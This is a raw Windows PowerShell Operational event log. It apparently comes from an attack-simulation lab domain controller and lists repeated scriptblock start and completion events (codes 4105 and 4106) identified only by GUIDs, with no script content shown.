Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467022
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467021
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467020
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467019
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467018
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467017
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467016
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467015
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467014
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467013
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467012
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467011
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467010
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467009
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467008
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467007
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467147
Keywords=None
Message=Started invocation of ScriptBlock ID: 21ff2f47-7fd8-427b-b75b-f899cb75b195
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467146
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467145
Keywords=None
Message=Completed invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467144
Keywords=None
Message=Started invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467143
Keywords=None
Message=Started invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467142
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2b8a6a55-e06f-40c6-940b-d8913924ad1b
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467141
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4e354fce-dba3-49f4-a326-30f4b8e85590
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467140
Keywords=None
Message=Started invocation of ScriptBlock ID: 4e354fce-dba3-49f4-a326-30f4b8e85590
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467139
Keywords=None
Message=Started invocation of ScriptBlock ID: 2b8a6a55-e06f-40c6-940b-d8913924ad1b
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467138
Keywords=None
Message=Completed invocation of ScriptBlock ID: a50a9f24-1418-4a8c-bcc7-9e8180e893e8
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467137
Keywords=None
Message=Completed invocation of ScriptBlock ID: 84cd98af-2c82-4e5a-9203-6398b3ef2099
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467136
Keywords=None
Message=Started invocation of ScriptBlock ID: 84cd98af-2c82-4e5a-9203-6398b3ef2099
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467135
Keywords=None
Message=Completed invocation of ScriptBlock ID: ecf3681d-de56-402b-9e8c-af822ef9ac51
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467134
Keywords=None
Message=Started invocation of ScriptBlock ID: ecf3681d-de56-402b-9e8c-af822ef9ac51
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467133
Keywords=None
Message=Started invocation of ScriptBlock ID: a50a9f24-1418-4a8c-bcc7-9e8180e893e8
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467132
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467131
Keywords=None
Message=Completed invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467130
Keywords=None
Message=Started invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467129
Keywords=None
Message=Started invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467128
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467127
Keywords=None
Message=Completed invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467126
Keywords=None
Message=Started invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467125
Keywords=None
Message=Started invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467124
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467123
Keywords=None
Message=Completed invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467122
Keywords=None
Message=Started invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467121
Keywords=None
Message=Started invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467120
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467119
Keywords=None
Message=Completed invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467118
Keywords=None
Message=Started invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467117
Keywords=None
Message=Started invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467116
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467115
Keywords=None
Message=Completed invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467114
Keywords=None
Message=Started invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467113
Keywords=None
Message=Started invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467112
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467111
Keywords=None
Message=Completed invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467110
Keywords=None
Message=Started invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467109
Keywords=None
Message=Started invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
